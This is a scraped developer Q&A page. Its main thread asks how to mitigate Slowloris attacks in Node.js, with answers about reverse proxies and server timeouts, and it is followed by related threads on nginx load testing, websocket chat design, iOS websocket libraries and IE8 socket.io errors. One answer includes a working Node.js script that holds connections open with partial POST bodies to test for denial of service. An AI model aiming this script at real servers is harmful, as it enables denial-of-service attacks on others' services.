How to mitigate Slowloris in Node.js? - javascript

Update
_ https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/ _.
Update Friday, 13th 2018:
I managed to convince the Node.js core team about setting a CVE for that.
The fix — new defaults and probably new API — will be there in 1 or 2 weeks.
Mitigate means to quiet an attack.
Everybody knows Slowloris:
HTTP Header or POST Data characters get transmitted slowly to block the socket.
Scaled that makes a much easier DoS attack.
**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
Since there is no inbuilt way to work on the header in the HTTP Server in Node.js.
I came to the question, if I can combine net and a HTTP Server for mitigating Slowloris .
The idea to `destroy` the `connection` in case of `Slowloris` is this.
http.createServer(function(req, res) {
var timeout;
net.on('data', function(chunk) {
clearTimeout(timeout);
timeout = setTimeout(function() {
req.connection.destroy();
}, 100);
};
};
The problem I can see is, both services have to listen on the same Socket on Port 80 and 443.
Do — not — know how to tackle this.
It is possible to transfer requests and responses from net to HTTP-Server and back.
But this takes 2 sockets for 1 incoming message.
And 2 sockets for 1 outgoing message.
So this is — not — feasible in sense of high available server.
I have no clue.
What can the world do to get rid of this scourge?
CVE for Apache Tomcat.
This is a serious security threat.
I think this want to be solved on C or C++ base.
I cannot write these real programmer languages.
But all of us are helped, if somebody pushes this on Github.
Because the community there once deleted my thread about mitigating Slowloris.

The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approached, such as OOP, you will probably recognize the importance behind "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handle data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc').
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiations, slow clients, etc'.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple, do not directly expose the node.js application to the internet, use a proxy layer - it exists for a reason.

I think you're taking a wrong approach for this vulnerability.
This doesn't deal with DDOS attack (Distributed Denial of Service) where many IPs are used, and when you need to continue serving some machines that are inside the same firewall as machines involved in the attack.
Often machines used in DDOS aren't real machines that have been taken over (maybe vitualized or with software to do it from different IPs).
When a DDOS against a large target starts, per-IP throttling may ban all machines from the same fire-walled LAN.
To continue providing service in the face of a DDOS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DOS attacks, unlike XSRF, don't need to originate from real browsers so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: To prevent this issue, you had to have a good firewall policies against DDos attacks and massive denial services.
BUT! If you want to do something to test a Denial service with node.js, you can use this code (use only for test purposes, not for a production environment)
var net = require('net');
var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;
function Connection(h, p)
{
this.state = 'active';
this.t = Date.now();
this.client = net.connect({port:p, host:h}, () => {
process.stdout.write("Connected, Sending... ");
this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
"Content-Type: application/x-www-form-urlenconded\r\n" +
"Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
process.stdout.write("Written.\n");
});
this.client.on('data', (data) => {
console.log("\t-Received "+data.length+" bytes...");
this.client.end();
});
this.client.on('end', () => {
var d = Date.now() - this.t;
this.state = 'ended';
console.log("\t-Disconnected (duration: " +
(d/1000).toFixed(3) +
" seconds, remaining open: " +
connections.length +
").");
});
this.client.on('error', () => {
this.state = 'error';
});
connections.push(this);
}
setInterval(() => {
var notify = false;
// Add another connection if we haven't reached
// our max:
if(connections.length < maxConnections)
{
new Connection(host, port);
notify = true;
}
// Remove dead connections
connections = connections.filter(function(v) {
return v.state=='active';
});
if(notify)
{
console.log("Active connections: " + connections.length +
" / " + maxConnections);
}
}, 500);

It is as easy as this.
var http = require('http');
var server = http.createServer(function(req,res) {
res.send('Now.')
})
server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
By default, the Server's timeout value is 2 minutes, and sockets are
destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with.
var net = require('net');
var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
setInterval(function() {
client.write('Hello World.');
},10000)
});
This is only the second to best solution.
Since legit connections are terminated also.

Related

Why increasing worker_connections in Nginx makes the application slower in node.js cluster?

I'm transforming my application to node.js cluster which I hope it would boost the performance of my application.
Currently, I'm deploying the application to 2 EC2 t2.medium instances. I have Nginx as a proxy and ELB.
This is my express cluster application which is pretty standard from the documentation.
var bodyParser = require('body-parser');
var cors = require('cors');
var cluster = require('cluster');
var debug = require('debug')('expressapp');
if(cluster.isMaster) {
var numWorkers = require('os').cpus().length;
debug('Master cluster setting up ' + numWorkers + ' workers');
for(var i = 0; i < numWorkers; i++) {
cluster.fork();
}
cluster.on('online', function(worker) {
debug('Worker ' + worker.process.pid + ' is online');
});
cluster.on('exit', function(worker, code, signal) {
debug('Worker ' + worker.process.pid + ' died with code: ' + code + ', and signal: ' + signal);
debug('Starting a new worker');
cluster.fork();
});
} else {
// Express stuff
}
This is my Nginx configuration.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '1024'
nginx::keepalive_timeout: '65'
I have 2 CPUs on Nginx server.
This is my before performance.
I get 1,500 request/s which is pretty good. Now I thought I would increase the number of connections on Nginx so I can accept more requests. I do this.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '2048'
nginx::keepalive_timeout: '65'
And this is my after performance.
Which I think it's worse than before.
I use gatling for performance testing and here's the code.
import io.gatling.core.Predef._
import io.gatling.http.Predef._
import scala.concurrent.duration._
class LoadTestSparrowCapture extends Simulation {
val httpConf = http
.baseURL("http://ELB")
.acceptHeader("application/json")
.doNotTrackHeader("1")
.acceptLanguageHeader("en-US,en;q=0.5")
.acceptEncodingHeader("gzip, defalt")
.userAgentHeader("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0")
val headers_10 = Map("Content-Type" -> "application/json")
val scn = scenario("Load Test")
.exec(http("request_1")
.get("/track"))
setUp(
scn.inject(
atOnceUsers(15000)
).protocols(httpConf))
}
I deployed this to my gatling cluster. So, I have 3 EC2 instances firing 15,000 requests in 30s to my application.
The question is, is there anything I can do to increase my performance of my application or I just need to add more machines?
The route that I'm testing is pretty simple, I get the request and send it off to RabbitMQ so it can be processed further. So, the response of that route is pretty fast.
You've mentioned that you are using AWS and in the front of your EC2 instances in ELB. As I see you are getting 502 and 503 status codes. These can be sent from ELB or your EC2 instances. Make sure that when doing the load-test you know from where the errors are coming from. You can check this in AWS console in ELB CloudWatch metrics.
Basically HTTPCode_ELB_5XX means your ELB sent 50x. On other hand HTTPCode_Backend_5XX sent 50x. You can also verify that in the logs of ELB. Better explanation of errors of ELB you can find here.
To load-test on AWS you should definitely read this. Point is that ELB is just another set of machines, which needs to scale if your load increases. Default scaling strategy is (cited from the section "Ramping Up Testing"):
Once you have a testing tool in place, you will need to define the growth in the load. We recommend that you increase the load at a rate of no more than 50 percent every five minutes.
That means when you start at some number of concurrent users, lets say 1000, per default you should increase only up to 1500 within 5 minutes. This will guarantee that ELB will scale with load on your servers. Exact numbers may vary and you have to test them on your own. Last time I've tested it sustained load of 1200 req./s w/o an issue and then I've started to receive 50x. You can test it easily running ramp-up scenario from X to Y users from single client and waiting for 50x.
Next very important thing (from part "DNS Resoultion") is:
If clients do not re-resolve the DNS at least once per minute, then the new resources Elastic Load Balancing adds to DNS will not be used by clients.
In short it means that you have to guarantee that TTL in DNS is respected, or that your clients re-resolve and rotate DNS IPs which they received by doing DNS lookup to guarantee round-robin fashion to distributing load. If not (e.g. testing from only one client, not your case) you can skew the results by overloading one instance of ELB by targeting all the traffic only to one instance. That means ELB will not scale at all.
Hope it will help.

What is the best technology for a chat/shoutbox system? Plain JS, JQuery, Websockets, or other?

I have an old site running, which also has a chat system, which always used to work fine. But recently I picked up the project again and started improving and the user base has been increasing a lot. (running on a VPS)
Now this shoutbox I have (running at http://businessgame.be/shoutbox) has been getting issues lately, when there are over 30 people online at the same time, it starts to really slow down the entire site.
This shoutbox system was written years ago by the old me (which ironically was the young me) who was way too much into old school Plain Old JavaScript (POJS?) and refused to use frameworks like JQuery.
What I do is I poll every 3 seconds with AJAX if there are new messages, and if YES, load all those messages (which are handed as an XML file which is then parsed by the JS code into HTML blocks which are added to the shoutbox content.
Simplified the script is like this:
The AJAX functions
function createRequestObject() {
var xmlhttp;
if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
} else { // code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
// Create the object
return xmlhttp;
}
function getXMLObject(XMLUrl, onComplete, onFail) {
var XMLhttp = createRequestObject();
// Check to see if the latest shout time has been initialized
if(typeof getXMLObject.counter == "undefined") {
getXMLObject.counter = 0;
}
getXMLObject.counter++;
XMLhttp.onreadystatechange = function() {
if(XMLhttp.readyState == 4) {
if(XMLhttp.status == 200) {
if(onComplete) {
onComplete(XMLhttp.responseXML);
}
} else {
if(onFail) {
onFail();
}
}
}
};
XMLhttp.open("GET", XMLUrl, true);
XMLhttp.send();
setTimeout(function() {
if(typeof XMLhttp != "undefined" && XMLhttp.readyState != 4) {
XMLhttp.abort();
if(onFail) {
onFail();
}
}
}, 5000);
}
Chat functions
function initShoutBox() {
// Check for new shouts every 2 seconds
shoutBoxInterval = setInterval("shoutBoxUpdate()", 3000);
}
function shoutBoxUpdate() {
// Get the XML document
getXMLObject("/ajax/shoutbox/shoutbox.xml?time=" + shoutBoxAppend.lastShoutTime, shoutBoxAppend);
}
function shoutBoxAppend(xmlData) {
process all the XML and add it to the content, also remember the timestamp of the newest shout
}
The real script is far more convoluted, with slower loading times when the page is blurred and keeping track of AJAX calls to avoid double calls at the same time, ability to post a shout, load settings etc. All not very relevant here.
For those interested, full codes here:
http://businessgame.be/javascripts/xml.js
http://businessgame.be/javascripts/shout.js
Example of the XML file containing the shout data
http://businessgame.be/ajax/shoutbox/shoutbox.xml?time=0
I do the same for getting a list of the online users every 30 seconds and checking for new private messages every 2 minutes.
My main question is, since this old school JS is slowing down my site, will changing the code to JQuery increase the performance and fix this issue? Or should I choose to go for an other technology alltogether like nodeJS, websockets or something else? Or maybe I am overlooking a fundamental bug in this old code?
Rewriting an entire chat and private messages system (which use the same backend) requires a lot of effort so I'd like to do this right from the start, not rewriting the whole thing in JQuery, just to figure out it doesn't solve the issue at hand.
Having 30 people online in the chatbox at the same time is not really an exception anymore so it should be a rigid system.
Could perhaps changing from XML data files to JSON increase performance as well?
PS: Backend is PHP MySQL
I'm biased, as I love Ruby and I prefer using Plain JS over JQuery and other frameworks.
I believe you're wasting a lot of resources by using AJAX and should move to websockets for your use-case.
30 users is not much... When using websockets, I would assume a single server process should be able to serve thousands of simultaneous updates per second.
The main reason for this is that websockets are persistent (no authentication happening with every request) and broadcasting to a multitude of connections will use the same amount of database queries as a single AJAX update.
In your case, instead of everyone reading the whole XML every time, a POST event will only broadcast the latest (posted) shout (not the whole XML), and store it in the XML for persistent storage (used for new visitors).
Also, you don't need all the authentication and requests that end up being answered with a "No, there aren't any pending updates".
Minimizing the database requests (XML reads) should prove to be a huge benefit when moving from AJAX to websockets.
Another benifit relates to the fact that enough simultaneous users will make AJAX polling behave the same as a DoS attack.
Right now, 30 users == 10 requests per second. This isn't much, but it can be heavy if each request would take more than 100ms - meaning, that the server answers less requests than it receives.
The home page for the Plezi Ruby Websocket Framework has this short example for a shout box (I'm Plezi's author, I'm biased):
# finish with `exit` if running within `irb`
require 'plezi'
class ChatServer
def index
render :client
end
def on_open
return close unless params[:id] # authentication demo
broadcast :print,
"#{params[:id]} joind the chat."
print "Welcome, #{params[:id]}!"
end
def on_close
broadcast :print,
"#{params[:id]} left the chat."
end
def on_message data
self.class.broadcast :print,
"#{params[:id]}: #{data}"
end
protected
def print data
write ::ERB::Util.html_escape(data)
end
end
path_to_client = File.expand_path( File.dirname(__FILE__) )
host templates: path_to_client
route '/', ChatServer
The POJS client looks like so (the DOM update and from data access ($('#text')[0].value) use JQuery):
ws = NaN
handle = ''
function onsubmit(e) {
e.preventDefault();
if($('#text')[0].value == '') {return false}
if(ws && ws.readyState == 1) {
ws.send($('#text')[0].value);
$('#text')[0].value = '';
} else {
handle = $('#text')[0].value
var url = (window.location.protocol.match(/https/) ? 'wss' : 'ws') +
'://' + window.document.location.host +
'/' + $('#text')[0].value
ws = new WebSocket(url)
ws.onopen = function(e) {
output("<b>Connected :-)</b>");
$('#text')[0].value = '';
$('#text')[0].placeholder = 'your message';
}
ws.onclose = function(e) {
output("<b>Disonnected :-/</b>")
$('#text')[0].value = '';
$('#text')[0].placeholder = 'nickname';
$('#text')[0].value = handle
}
ws.onmessage = function(e) {
output(e.data);
}
}
return false;
}
function output(data) {
$('#output').append("<li>" + data + "</li>")
$('#output').animate({ scrollTop:
$('#output')[0].scrollHeight }, "slow");
}
If you want to add more events or data, you can consider using Plezi's auto-dispatch feature, that also provides you with an easy to use lightweight Javascript client with an AJAJ (AJAX + JSON) fallback.
...
But, depending on your server's architecture and whether you mind using heavier frameworks or not, you can use the more common socket.io (although it starts with AJAX and only moves to websockets after a warmup period).
EDIT
Changing from XML to JSON will still require parsing. The question is actually whether XML vs. JSON parsing speeds.
JSON will be faster on the client javascript, according to the following SO question and answer: Is parsing JSON faster than parsing XML
JSON seems to be also favored on the server-side for PHP (might be opinion based rather than tested): PHP: is JSON or XML parser faster?
BUT... I really think your bottleneck isn't the JSON or the XML. I believe the bottleneck relates to the multitude of times that the data is accessed, (parsed?) and reviewed by the server when using AJAX.
EDIT2 (due to comment about PHP vs. node.js)
You can add a PHP websocket layer using Ratchet... Although PHP wasn't designed for long running processes, so I would consider adding a websocket dedicated stack (using a local proxy to route websocket connections to a different application).
I love Ruby since it allows you to quickly and easily code a solution. Node.js is also commonly used as a dedicated websocket stack.
I would personally avoid socket.io, because it abstracts the connection method (AJAX vs Websockets) and always starts as AJAX before "warming up" to an "upgrade" (websockets)... Also, socket.io uses long-polling when not using websockets, which I this is terrible. I'd rather show a message telling the client to upgrade their browser.
Jonny Whatshisface pointed out that using a node.js solution he reached a limit of ~50K concurrent users (which could be related to the local proxy's connection limit). Using a C solution, he states to have no issues with more than 200K concurrent users.
This obviously depends also on the number of updates per second and on whether you're broadcasting the data or sending it to specific clients... If you're sending 2 updates per user per second for 200K users, that's 400K updates. However, updating all the users only once every 2 seconds, that's 100K updates per second. So trying to figure out the maximum load can be a headache.
Personally, I didn't get to reach these numbers on my apps, so I never got to discover Plezi's limits first hand... although, during testing, I had no issues with sending hundred of thousands of updates per second (but I did had a connection limit due to available ports and open file handle limits on my local machine).
This definitely shows how vast of an improvement you can reach by utilizing websockets (especially since you stated to notice slowdowns with 30 concurrent users).

What Websocket library for a Node.js server works best with iOS clients?

On the iOS clients, I'm using SocketRocket by Square: https://github.com/square/SocketRocket
Everywhere I have looked, I have found comparisons of Websocket libraries based on web applications accessed from browser, or queried in a database, but nothing as yet for clients that are iOS smartphone apps.
The clients would connect to the remote server on request through the app (i.e. the connection isn't "always-on" or done through a mobile browser or proxy or GameCenter), and, once connected, be paired with other clients in a two-player "game" situation. Until a match ends, the connection would need to persist, and the server would be responsible for timing each user's turn and receiving & issuing commands from/to each user, sort of like a turn-based game except each turn has a server-managed time limit. After a match ends (generally 15-20 minutes), if a user doesn't want another match with another random opponent, then the connection would be closed and the user logged off; users that want to continue would then be matched with another user by the hosting server (running Node.js and the Websocket library).
Some of the options I have considered include
Socket.IO 1.0: http://socket.io/
Sockjs: https://github.com/sockjs
ws: https://github.com/einaros/ws
nodejs-websocket: https://www.npmjs.com/package/nodejs-websocket
but heard from https://medium.com/#denizozger/finding-the-right-node-js-websocket-implementation-b63bfca0539 that Socket.IO isn't optimal for heavy user traffic (and I'm anticipating more than 300 users requesting matches at any one point), and that Sockjs doesn't have some command query feature, but didn't quite find a conclusive answer in the context of smartphones or iOS devices -- not browsers -- either way, in any situation.
The question is what Node.js server Websocket library might play nicest or interface with the fewest stability/scalability/complexity concerns with the iOS clients running SocketRocket? The SocketRocket wiki itself isn't helpful as it uses a Python/Go-based server side test.
EDIT: Potentially helpful resource:
http://www.teehanlax.com/blog/how-to-socket-io-swift/
Only missing thing is a comparison or discussion of other potential websocket APIs, not just Socket.IO. But this is a start in that it seems to be working with the latest iOS, SocketRocket, and Socket.IO builds.
I like Sockjs because it is simple. Here is an implementation for SocketRocket --> Sockjs that works as proof of concept
NEED:
-SocketRocket (add libicucore.dylib, Security.framework and CFNetwork.framework to your project)
-Node.js
-Sockjs Server
SERVER:
var http = require('http'),
sockjs = require('sockjs'),
sockserver = sockjs.createServer(),
connections = [];
sockserver.on('connection', function(conn) {
console.log('Connected');
connections.push(conn);
conn.on('data', function(message) {
console.log('Message: ' + message);
// send the message to all clients
for (var i=0; i < connections.length; ++i) {
connections[i].write(message);
}
//
});
conn.on('close', function() {
connections.splice(connections.indexOf(conn), 1); // remove the connection
console.log('Disconnected');
});
});
var server = http.createServer();
sockserver.installHandlers(server, {prefix:'/sockserver'});
server.listen(3000, '0.0.0.0'); // http://localhost:3000/sockserver/websocket
CLIENT (ViewController.m):
#import "ViewController.h"
#interface ViewController ()
#end
#implementation ViewController
{
SRWebSocket *myWebSocket;
__weak IBOutlet UILabel *connectionStatus;
__weak IBOutlet UITextView *myTextView;
}
- (void)viewDidLoad {
[super viewDidLoad];
connectionStatus.textColor = [UIColor redColor];
myWebSocket = [[SRWebSocket alloc] initWithURL:[[NSURL alloc] initWithString:#"http://localhost:3000/sockserver/websocket"]];
myWebSocket.delegate = self;
[myWebSocket open];
}
- (void)didReceiveMemoryWarning {
[super didReceiveMemoryWarning];
// Dispose of any resources that can be recreated.
}
- (void)webSocket:(SRWebSocket *)webSocket didReceiveMessage:(id)message{
myTextView.text = message;
NSLog(#"message: %#",message);
}
- (void)webSocket:(SRWebSocket *)webSocket didCloseWithCode:(NSInteger)code reason:(NSString *)reason wasClean:(BOOL)wasClean{
connectionStatus.text = #"Disconnected";
connectionStatus.textColor = [UIColor redColor];
}
- (void)webSocketDidOpen:(SRWebSocket *)webSocket{
connectionStatus.text = #"Connected";
connectionStatus.textColor = [UIColor greenColor];
}
- (void)webSocket:(SRWebSocket *)webSocket didFailWithError:(NSError *)error{
}
#end
src: http://nunoferro.pt/?p=22

Node.js / Server.js socket implementation problems

Having a hard time implementing a node.js/server.js setup
I'm a bit stuck right now, and hoping someone can shed some light. I'm relatively new to sockets in general, but have been programming in javascript on and off for several years, although only about as deep as is necessary to accomplish the task at hand. As a result, my understanding of some of the concepts surrounding the javascript stack heap, and sockets in general are somewhat limited.
Ok Here's the situation:
I've created an application intended to simply increment a counter, on several machines. Several users can click the "next" button and it will update instantly on all machines.
When you first connect, it retrieves the current number, and spits it out locally.
I've created the server here:
var io = require("socket.io");
var sockets = io.listen(8000);
var currentlyServing=0;
sockets.on("connection", function (socket)
{
console.log("client connected");
socket.emit("receive", currentlyServing);
socket.on("update", function(serving)
{
currentlyServing=serving;
if(currentlyServing>100)
currentlyServing=0;
if(currentlyServing<0)
currentlyServing=99;
socket.broadcast.emit("receive", currentlyServing);
console.log("update received: "+currentlyServing);
});
});
console.log("Server Started");
Here is the relevant (I hope) excerpt from the client side:
var socket = io.connect("http://www.sampledomain.com:8000");
//function to update the page when a new update is received
socket.on("receive", function(receivedServing)
{
document.getElementById('msgs').value=""+String("00" + receivedServing).slice(-2);
document.getElementById('nowServing').value=receivedServing;
});
//this is called in an onClick event in the HTML source
//sends the new number to all other stations except this one (handled by server side)
function nextServing()
{
var sendServing = parseInt(document.getElementById('nowServing').value)+1;
socket.emit("update", sendServing);
document.getElementById('nowServing').value=sendServing;
document.getElementById('msgs').value=""+String("00" + sendServing).slice(-2);
}
Ok so here's my problem. This runs absolutely fine in every system I've put it in, smoothly and beautifully - except for IE8. If left alone for more than 2-3 minutes (with no activity at all), I eventually receive a "stack overflow" error. The line number it appears on fluctuates (haven't determined the factors involved yet), but it always happens at that interval. On some workstations it takes longer, which I'm beginning to think has a direct correlation to the amount of phsyical RAM the machine has, or at least how much is being allocated to the web browser.
I found an online function to determine "max stack size", which I realize is not an exact science, however I did consistently get a number in the area of 3000. On my IE11 machine with considerable more resources, I found it to be in the area of 20,000. This may not be relevant, but I figured the more info the better :)
To avoid this problem for now so that the end users don't see this error message, I've take the entire client script, and put it into an iFrame which reloads itself every 60 seconds,essentially resetting the stack, which feels so dirty sitting so close to a web socket, but has bought me the time to post here. I've googled until I can't google any more, but when you search "node.js" or "socket.io" along with "stack overflow" on google, you just get a lot of posts about the two topics that are hosted on the stackoverflow dot com website. ARG lol
Anyone?
EDIT ON NOVEMBER 18TH 2014 AS PER COMMENTS BELOW:
the error message is most often claiming stack overflow at line 1056. IE Developer tools points towards the file socket.io.js. Line 1056 is:
return fn.apply(obj, args.concat(slice.call(arguments)));
which is insdie this section of the file:
var slice = [].slice;
/**
* Bind `obj` to `fn`.
*
* #param {Object} obj
* #param {Function|String} fn or string
* #return {Function}
* #api public
*/
module.exports = function(obj, fn){
if ('string' == typeof fn) fn = obj[fn];
if ('function' != typeof fn) throw new Error('bind() requires a function');
var args = slice.call(arguments, 2);
return function(){
return fn.apply(obj, args.concat(slice.call(arguments)));
}
};
From what I've read it seems that the problem on IE8 might be related to flash. It IE8 uses flashsocket as the default configuration. I suggest to try the following on the client side:
if(navigator.appName.indexOf("Internet Explorer")!=-1 && navigator.appVersion.indexOf("MSIE 8")==-1 ){
socket = io.connect("http://www.sampledomain.com:8000", {
transports: ['xhr-polling']
});
}
else
{
socket = io.connect("http://www.sampledomain.com:8000" );
}
This should make IE8 use long polling while all other machines use the best method they can.
On a side note: You might also want to consider incrementing the "serving" variable on the server.
Find existing issue Causes a "Stack Overflow" in IE8 when using xhr-polling #385.
This was fixed by disabling Flash.
Also find Safari over windows client use xhr-polling instead of websocket - performance are severely harm #1147. While this is Safari it may apply to IE8 because it is using similar mechanism.
I did a small test using your socket.io but in IE 10 and emulated IE8
so that I could debug well. Started capturing Network in the tab and
noticed the requests logging every few seconds.Left alone for few
minutes and I see a lot of requests logged in. You will not see this
in Chrome because it has true WebSockets. While IE8 does not support
WebSockets socket.io emulate that using plain HTTP GET/POST using some
mechanism. So my theory is that even if socket.io works with IE8 it
does not reliably emulate web sockets
My advice is to rule out IE 8 for long running client application. IE8 is no longer supported by Microsoft.
maybe try to replace
""+String("00" + receivedServing).slice(-2)
with
('00' + receivedServing).slice(-2)

Poor network performance with Websockets running on apple device

I am working on an HTML/Javascript running on mobile devices that is communicating with a Qt/C++ application running on a PC. Both the mobile device and the PC are on a local network. The communication between the HTML page (client) and the C++ app (server) is done using Websockets.
The HTML page is a remote control for the C++ application, so it is needed to have a low latency connection between the mobile device and the PC.
When using any non-Apple device as a client, data is sent to a rate between 60 to 120 frames/sec, which is totally acceptable. When using an Apple device, this rate falls to 3-4 frames/sec.
I also checked ping times (Websocket implementation, not a ping command from command line). They are acceptable (1-5 ms) for Apple devices as long as the device is not transmitting data. Whenever it transmits data, this ping time raises to 200ms.
Looking from the Javascript side, the Apple devices always send data at a consistent rate of 60 frames/sec, as any other devices do. However, on the server side, only 3 to 4 of these 60 frames are received when the client is an Apple device.
Does anyone have any idea on what can be happening?
Here is my Javascript code :
<script language="javascript" type="text/javascript">
var wsUri = document.URL.replace("http", "ws");
var output;
var websocket;
function init()
{
output = document.getElementById("output");
wsConnect();
}
function wsConnect()
{
console.log("Trying connection to " + wsUri);
try
{
output = document.getElementById("output");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt)
{
onOpen(evt)
};
websocket.onclose = function(evt)
{
onClose(evt)
};
websocket.onmessage = function(evt)
{
onMessage(evt)
};
websocket.onerror = function(evt)
{
onError(evt)
};
}
catch (e)
{
console.log("Exception " + e.toString());
}
}
function onOpen(evt)
{
alert("Connected to " + wsUri);
}
function onClose(evt)
{
alert("Disconnected");
}
function onMessage(evt)
{
alert('Received message : ' + evt.data);
}
function onError(evt)
{
alert("Error : " + evt.toString());
}
function doSend(message)
{
websocket.send(message);
}
window.addEventListener("load", init, false);
</script>
Data is sent from Javascript side using dosend() function.
Few ideas and suggestions.
Check if the client's WebSocket protocol is supported by the server. This question and answer discuss a case where different protocol versions were an issue.
The WebSocket standard permits implementations to arbitrarily delay transmissions and perform fragmentation. Additionally, control frames, such as Ping, do not support fragmentation, but are permitted to be interjected. These permitted behavioral difference may be contributing to the difference in times.
Check if the bufferedAmount attribute on the WebSocket to determine if the WebSocket is buffering the data. If the bufferedAmount attribute is often zero, then data has been passed to the OS, which may be buffering it based on OS or socket configurations, such as Nagle.
This question and answer mentions resolving delays by having the server send acknowledgements for each message.
To get a deeper view into the interactions, it may be useful to perform a packet trace. This technical Q&A in the Mac Developer Library may provide some resources as to how to accomplish this.
The best way to get some more insight is to use the AutobahnTestsuite. You can test both clients and servers with that suite and find out where problems are situated.
I have created QWebSockets, a Qt based websockets implementation, and used that on several occasions to create servers. Performance from Apple devices is excellent.
However, there seems to be a severe problem with Safari when it comes to large messages (see https://github.com/KurtPattyn/QWebSockets/wiki/Performance-Tests). Maybe that is the problem.

Categories